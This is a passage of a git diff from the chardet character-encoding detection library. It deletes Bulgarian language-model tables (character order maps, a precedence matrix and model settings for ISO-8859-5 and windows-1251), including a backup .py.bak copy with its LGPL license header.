-3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,3,3,0,3,1,0, -0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,2,3,2,2,1,3,3,3,3,2,2,2,1,1,2,0,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,2,3,2,2,3,3,1,1,2,3,3,2,3,3,3,3,2,1,2,0,2,0,3,0,0, -0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,1,3,3,3,3,3,2,3,2,3,3,3,3,3,2,3,3,1,3,0,3,0,2,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,1,3,3,2,3,3,3,1,3,3,2,3,2,2,2,0,0,2,0,2,0,2,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,3,3,1,2,2,3,2,1,1,2,0,2,0,0,0,0, -1,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,2,3,3,1,2,3,2,2,2,3,3,3,3,3,2,2,3,1,2,0,2,1,2,0,0, -0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,1,3,3,3,3,3,2,3,3,3,2,3,3,2,3,2,2,2,3,1,2,0,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,3,3,3,1,1,1,2,2,1,3,1,3,2,2,3,0,0,1,0,1,0,1,0,0, -0,0,0,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,2,2,3,2,2,3,1,2,1,1,1,2,3,1,3,1,2,2,0,1,1,1,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,1,3,2,2,3,3,1,2,3,1,1,3,3,3,3,1,2,2,1,1,1,0,2,0,2,0,1, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,2,2,3,3,3,2,2,1,1,2,0,2,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,0,1,2,1,3,3,2,3,3,3,3,3,2,3,2,1,0,3,1,2,1,2,1,2,3,2,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,1,1,2,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,1,3,3,2,3,3,2,2,2,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,0,3,3,3,3,3,2,1,1,2,1,3,3,0,3,1,1,1,1,3,2,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,1,1,3,1,3,3,2,3,2,2,2,3,0,2,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,2,3,3,2,2,3,2,1,1,1,1,1,3,1,3,1,1,0,0,0,1,0,0,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,2,3,2,0,3,2,0,3,0,2,0,0,2,1,3,1,0,0,1,0,0,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,2,1,1,1,1,2,1,1,2,1,1,1,2,2,1,2,1,1,1,0,1,1,0,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,2,1,3,1,1,2,1,3,2,1,1,0,1,2,3,2,1,1,1,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,2,2,1,0,1,0,0,1,0,0,0,2,1,0,3,0,0,1,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,2,3,2,3,3,1,3,2,1,1,1,2,1,1,2,1,3,0,1,0,0,0,1,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,2,2,3,3,2,3,2,2,2,3,1,2,2,1,1,2,1,1,2,2,0,1,1,0,1,0,2,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,2,1,3,1,0,2,2,1,3,2,1,0,0,2,0,2,0,1,0,0,0,0,0,0,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,1,2,0,2,3,1,2,3,2,0,1,3,1,2,1,1,1,0,0,1,0,0,2,2,2,3, -2,2,2,2,1,2,1,1,2,2,1,1,2,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1, -3,3,3,3,3,2,1,2,2,1,2,0,2,0,1,0,1,2,1,2,1,1,0,0,0,1,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,2,3,3,1,1,3,1,0,3,2,1,0,0,0,1,2,0,2,0,1,0,0,0,1,0,1,2,1,2,2, -1,1,1,1,1,1,1,2,2,2,1,1,1,1,1,1,1,0,1,2,1,1,1,0,0,0,0,0,1,1,0,0, -3,1,0,1,0,2,3,2,2,2,3,2,2,2,2,2,1,0,2,1,2,1,1,1,0,1,2,1,2,2,2,1, -1,1,2,2,2,2,1,2,1,1,0,1,2,1,2,2,2,1,1,1,0,1,1,1,1,2,0,1,0,0,0,0, -2,3,2,3,3,0,0,2,1,0,2,1,0,0,0,0,2,3,0,2,0,0,0,0,0,1,0,0,2,0,1,2, -2,1,2,1,2,2,1,1,1,2,1,1,1,0,1,2,2,1,1,1,1,1,0,1,1,1,0,0,1,2,0,0, -3,3,2,2,3,0,2,3,1,1,2,0,0,0,1,0,0,2,0,2,0,0,0,1,0,1,0,1,2,0,2,2, -1,1,1,1,2,1,0,1,2,2,2,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0, -2,3,2,3,3,0,0,3,0,1,1,0,1,0,0,0,2,2,1,2,0,0,0,0,0,0,0,0,2,0,1,2, -2,2,1,1,1,1,1,2,2,2,1,0,2,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0, -3,3,3,3,2,2,2,2,2,0,2,1,1,1,1,2,1,2,1,1,0,2,0,1,0,1,0,0,2,0,1,2, -1,1,1,1,1,1,1,2,2,1,1,0,2,0,1,0,2,0,0,1,1,1,0,0,2,0,0,0,1,1,0,0, -2,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,0,0,0,1,2,0,1,2, -2,2,2,1,1,2,1,1,2,2,2,1,2,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0, -2,3,3,3,3,0,2,2,0,2,1,0,0,0,1,1,1,2,0,2,0,0,0,3,0,0,0,0,2,0,2,2, -1,1,1,2,1,2,1,1,2,2,2,1,2,0,1,1,1,0,1,1,1,1,0,2,1,0,0,0,1,1,0,0, -2,3,3,3,3,0,2,1,0,0,2,0,0,0,0,0,1,2,0,2,0,0,0,0,0,0,0,0,2,0,1,2, -1,1,1,2,1,1,1,1,2,2,2,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0, -3,3,2,2,3,0,1,0,1,0,0,0,0,0,0,0,1,1,0,3,0,0,0,0,0,0,0,0,1,0,2,2, -1,1,1,1,1,2,1,1,2,2,1,2,2,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,0,0, -3,1,0,1,0,2,2,2,2,3,2,1,1,1,2,3,0,0,1,0,2,1,1,0,1,1,1,1,2,1,1,1, -1,2,2,1,2,1,2,2,1,1,0,1,2,1,2,2,1,1,1,0,0,1,1,1,2,1,0,1,0,0,0,0, -2,1,0,1,0,3,1,2,2,2,2,1,2,2,1,1,1,0,2,1,2,2,1,1,2,1,1,0,2,1,1,1, -1,2,2,2,2,2,2,2,1,2,0,1,1,0,2,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0, -2,1,1,1,1,2,2,2,2,1,2,2,2,1,2,2,1,1,2,1,2,3,2,2,1,1,1,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,3,2,0,1,2,0,1,2,1,1,0,1,0,1,2,1,2,0,0,0,1,1,0,0,0,1,0,0,2, -1,1,0,0,1,1,0,1,1,1,1,0,2,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0, -2,0,0,0,0,1,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,2,1,1,1, -1,2,2,2,2,1,1,2,1,2,1,1,1,0,2,1,2,1,1,1,0,2,1,1,1,1,0,1,0,0,0,0, -3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0, -1,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,3,2,0,0,0,0,1,0,0,0,0,0,0,1,1,0,2,0,0,0,0,0,0,0,0,1,0,1,2, -1,1,1,1,1,1,0,0,2,2,2,2,2,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,1, -2,3,1,2,1,0,1,1,0,2,2,2,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,2, -1,1,1,1,2,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0, -2,2,2,2,2,0,0,2,0,0,2,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,0,2,2, -1,1,1,1,1,0,0,1,2,1,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,2,0,0,2,0,1,1,0,0,0,1,0,0,2,0,2,0,0,0,0,0,0,0,0,0,0,1,1, -0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,3,2,0,0,1,0,0,1,0,0,0,0,0,0,1,0,2,0,0,0,1,0,0,0,0,0,0,0,2, -1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -2,1,2,2,2,1,2,1,2,2,1,1,2,1,1,1,0,1,1,1,1,2,0,1,0,1,1,1,1,0,1,1, -1,1,2,1,1,1,1,1,1,0,0,1,2,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0, -1,0,0,1,3,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,2,1,0,0,1,0,2,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,0,2,0,0,1, -0,2,0,1,0,0,1,1,2,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,2,0,1,1,0,2,1,0,1,1,1,0,0,1,0,2,0,1,0,0,0,0,0,0,0,0,0,1, -0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,2,2,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1, -0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -2,0,1,0,0,1,2,1,1,1,1,1,1,2,2,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0, -1,1,2,1,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,1,2,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1, -0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0, -0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0, -1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,2,0,0,2,0,1,0,0,1,0,0,1, -1,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0, -1,1,1,1,1,1,1,2,0,0,0,0,0,0,2,1,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -) - -Latin5BulgarianModel = { \ - 'charToOrderMap': Latin5_BulgarianCharToOrderMap, - 'precedenceMatrix': BulgarianLangModel, - 'mTypicalPositiveRatio': 0.969392, - 'keepEnglishLetter': False, - 'charsetName': "ISO-8859-5" -} - -Win1251BulgarianModel = { \ - 'charToOrderMap': win1251BulgarianCharToOrderMap, - 'precedenceMatrix': BulgarianLangModel, - 'mTypicalPositiveRatio': 0.969392, - 'keepEnglishLetter': False, - 'charsetName': "windows-1251" -} diff --git a/chardet/chardet/langbulgarianmodel.py.bak b/chardet/chardet/langbulgarianmodel.py.bak deleted file mode 100644 index bf5641e..0000000 --- a/chardet/chardet/langbulgarianmodel.py.bak +++ /dev/null @@ -1,228 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# Character Mapping Table: -# this table is modified base on win1251BulgarianCharToOrderMap, so -# only number <64 is sure valid - -Latin5_BulgarianCharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40 -110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50 -253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60 -116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70 -194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209, # 80 -210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225, # 90 - 81,226,227,228,229,230,105,231,232,233,234,235,236, 45,237,238, # a0 - 31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # b0 - 39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,239, 67,240, 60, 56, # c0 - 1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # d0 - 7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,241, 42, 16, # e0 - 62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0 -) - -win1251BulgarianCharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40 -110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50 -253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60 -116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70 -206,207,208,209,210,211,212,213,120,214,215,216,217,218,219,220, # 80 -221, 78, 64, 83,121, 98,117,105,222,223,224,225,226,227,228,229, # 90 - 88,230,231,232,233,122, 89,106,234,235,236,237,238, 45,239,240, # a0 - 73, 80,118,114,241,242,243,244,245, 62, 58,246,247,248,249,250, # b0 - 31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # c0 - 39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,251, 67,252, 60, 56, # d0 - 1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # e0 - 7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0 -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 96.9392% -# first 1024 sequences:3.0618% -# rest sequences: 0.2992% -# negative sequences: 0.0020% -BulgarianLangModel = ( \ -0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2, -3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1, -0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,3,3,0,3,1,0, -0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,2,3,2,2,1,3,3,3,3,2,2,2,1,1,2,0,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,2,3,2,2,3,3,1,1,2,3,3,2,3,3,3,3,2,1,2,0,2,0,3,0,0, -0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,1,3,3,3,3,3,2,3,2,3,3,3,3,3,2,3,3,1,3,0,3,0,2,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,1,3,3,2,3,3,3,1,3,3,2,3,2,2,2,0,0,2,0,2,0,2,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,3,3,1,2,2,3,2,1,1,2,0,2,0,0,0,0, -1,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,2,3,3,1,2,3,2,2,2,3,3,3,3,3,2,2,3,1,2,0,2,1,2,0,0, -0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,1,3,3,3,3,3,2,3,3,3,2,3,3,2,3,2,2,2,3,1,2,0,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,3,3,3,1,1,1,2,2,1,3,1,3,2,2,3,0,0,1,0,1,0,1,0,0, -0,0,0,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,2,2,3,2,2,3,1,2,1,1,1,2,3,1,3,1,2,2,0,1,1,1,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,1,3,2,2,3,3,1,2,3,1,1,3,3,3,3,1,2,2,1,1,1,0,2,0,2,0,1, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,2,2,3,3,3,2,2,1,1,2,0,2,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,0,1,2,1,3,3,2,3,3,3,3,3,2,3,2,1,0,3,1,2,1,2,1,2,3,2,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,1,1,2,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,1,3,3,2,3,3,2,2,2,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,0,3,3,3,3,3,2,1,1,2,1,3,3,0,3,1,1,1,1,3,2,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,1,1,3,1,3,3,2,3,2,2,2,3,0,2,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,2,3,3,2,2,3,2,1,1,1,1,1,3,1,3,1,1,0,0,0,1,0,0,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,2,3,2,0,3,2,0,3,0,2,0,0,2,1,3,1,0,0,1,0,0,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,2,1,1,1,1,2,1,1,2,1,1,1,2,2,1,2,1,1,1,0,1,1,0,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,2,1,3,1,1,2,1,3,2,1,1,0,1,2,3,2,1,1,1,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,2,2,1,0,1,0,0,1,0,0,0,2,1,0,3,0,0,1,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,2,3,2,3,3,1,3,2,1,1,1,2,1,1,2,1,3,0,1,0,0,0,1,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,2,2,3,3,2,3,2,2,2,3,1,2,2,1,1,2,1,1,2,2,0,1,1,0,1,0,2,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,2,1,3,1,0,2,2,1,3,2,1,0,0,2,0,2,0,1,0,0,0,0,0,0,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,3,1,2,0,2,3,1,2,3,2,0,1,3,1,2,1,1,1,0,0,1,0,0,2,2,2,3, -2,2,2,2,1,2,1,1,2,2,1,1,2,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1, -3,3,3,3,3,2,1,2,2,1,2,0,2,0,1,0,1,2,1,2,1,1,0,0,0,1,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1, -3,3,2,3,3,1,1,3,1,0,3,2,1,0,0,0,1,2,0,2,0,1,0,0,0,1,0,1,2,1,2,2, -1,1,1,1,1,1,1,2,2,2,1,1,1,1,1,1,1,0,1,2,1,1,1,0,0,0,0,0,1,1,0,0, -3,1,0,1,0,2,3,2,2,2,3,2,2,2,2,2,1,0,2,1,2,1,1,1,0,1,2,1,2,2,2,1, -1,1,2,2,2,2,1,2,1,1,0,1,2,1,2,2,2,1,1,1,0,1,1,1,1,2,0,1,0,0,0,0, -2,3,2,3,3,0,0,2,1,0,2,1,0,0,0,0,2,3,0,2,0,0,0,0,0,1,0,0,2,0,1,2, -2,1,2,1,2,2,1,1,1,2,1,1,1,0,1,2,2,1,1,1,1,1,0,1,1,1,0,0,1,2,0,0, -3,3,2,2,3,0,2,3,1,1,2,0,0,0,1,0,0,2,0,2,0,0,0,1,0,1,0,1,2,0,2,2, -1,1,1,1,2,1,0,1,2,2,2,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0, -2,3,2,3,3,0,0,3,0,1,1,0,1,0,0,0,2,2,1,2,0,0,0,0,0,0,0,0,2,0,1,2, 